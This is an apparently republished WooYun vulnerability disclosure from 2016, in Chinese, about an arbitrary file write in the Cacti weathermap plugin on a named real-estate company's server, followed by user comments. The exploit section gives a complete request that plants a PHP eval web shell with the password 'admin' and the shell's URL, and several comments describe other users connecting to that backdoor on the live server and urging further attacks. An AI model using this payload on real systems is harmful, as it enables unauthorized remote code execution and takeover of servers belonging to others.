我爱我家某站任意文件写入Getshell

admin

139580
文章

114
评论

2017年4月9日16:38:52评论429 views字数 226阅读0分45秒阅读模式

摘要

2016-03-30：细节已通知厂商并且等待厂商处理中
2016-03-30：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-04：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(18) 关注此漏洞

缺陷编号： WooYun-2016-190836

漏洞标题：我爱我家某站任意文件写入Getshell

漏洞作者：路人甲

提交时间： 2016-03-30 19:41

公开时间： 2016-04-04 19:50

漏洞类型：命令执行

危害等级：高

自评Rank： 15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：第三方框架第三方不可信程序

8人收藏

漏洞详情

披露状态：

简要描述：

我爱我家某站任意文件写入Getshell

详细说明：

http://erpview.5i5j.com/

Cacti安装了weathermap插件，可写入任意文件

漏洞证明：

http://erpview.5i5j.com/

Cacti安装了weathermap插件，可写入任意文件

利用代码：

code 区域

/plugins/weathermap/editor.php?plug=0&mapname=jasmine.php&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=%3C?php%20echo%28md5%281%29%29;@eval%28$_POST[admin]%29;?%3E&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name

http://erpview.5i5j.com/plugins/weathermap/configs/jasmine.php

pass：admin

修复方案：

别忽略了有洞就修复

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-04-04 19:50

厂商回复：

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

100%

评价

2016-04-04 20:13 | 苦咖啡 ( 实习白帽子 | Rank:63 漏洞数:14 | 我就一菜逼，来看大牛装逼的)

1

这个Cacti的插件是怎么找出来的呢？

1# 回复此人
2016-04-04 20:36 | Security ( 实习白帽子 | Rank:32 漏洞数:12 )

1

@苦咖啡扫目录。

2# 回复此人
2016-04-04 22:38 | acai ( 路人 | Rank:2 漏洞数:1 | 请输入个人的简要介绍)

2

卧槽，直接留马了，居然还忽略。。。厂商大刁

3# 回复此人
2016-04-04 23:59 | Hxy ( 普通白帽子 | Rank:303 漏洞数:78 | Jasmine)

2

@苦咖啡 google;欢迎登录到CactiEZ中文版

4# 回复此人
2016-04-05 09:29 | 逆戟鲸 ( 路人 | Rank:2 漏洞数:1 | 学习中，请大大们多多指教)

1

洞主留了个jasmine，然后别人在上面就又跟了好多2333

5# 回复此人
2016-04-05 11:15 | 尊-折戟 ( 普通白帽子 | Rank:106 漏洞数:23 | 当我入梦，这个世界就将颤抖！)

1

已成马场

6# 回复此人
2016-04-05 12:28 | gentoofly ( 普通白帽子 | Rank:122 漏洞数:37 | 热爱Linux,热爱互联网)

1

翻了一下，没有找到什么有用的东西

7# 回复此人
2016-04-05 12:42 | J3c0sk ( 路人 | Rank:4 漏洞数:2 | *)

1

@gentoofly 貌似后门删了你怎么连接的

8# 回复此人
2016-04-05 13:13 | 苦咖啡 ( 实习白帽子 | Rank:63 漏洞数:14 | 我就一菜逼，来看大牛装逼的)

2

你们都太6666了不过对于这种已成马场了的厂商还忽略的了就应该是使劲干！！～～

9# 回复此人
2016-04-05 17:28 | gentoofly ( 普通白帽子 | Rank:122 漏洞数:37 | 热爱Linux,热爱互联网)

1

@J3c0sk 没有删除，还在

10# 回复此人
2016-04-06 22:05 | 欧尼酱 ( 路人 | Rank:15 漏洞数:7 | 技术马马虎虎)

1

无良厂商

11# 回复此人
2016-04-10 14:12 | J3c0sk ( 路人 | Rank:4 漏洞数:2 | *)

1

@gentoofly Not Found The requested URL /plugins/weathermap/configs/jasmine.php was not found on this server. Apache Server at erpview.5i5j.com Port 80

12# 回复此人
2016-04-10 22:37 | gentoofly ( 普通白帽子 | Rank:122 漏洞数:37 | 热爱Linux,热爱互联网)

1

@J3c0sk 连接不了了，应该是被厂商删除了

13# 回复此人

漏洞概要 关注数(18) 关注此漏洞

缺陷编号： WooYun-2016-190836

漏洞标题： 我爱我家某站任意文件写入Getshell

相关厂商： 5i5j.com

漏洞作者： 路人甲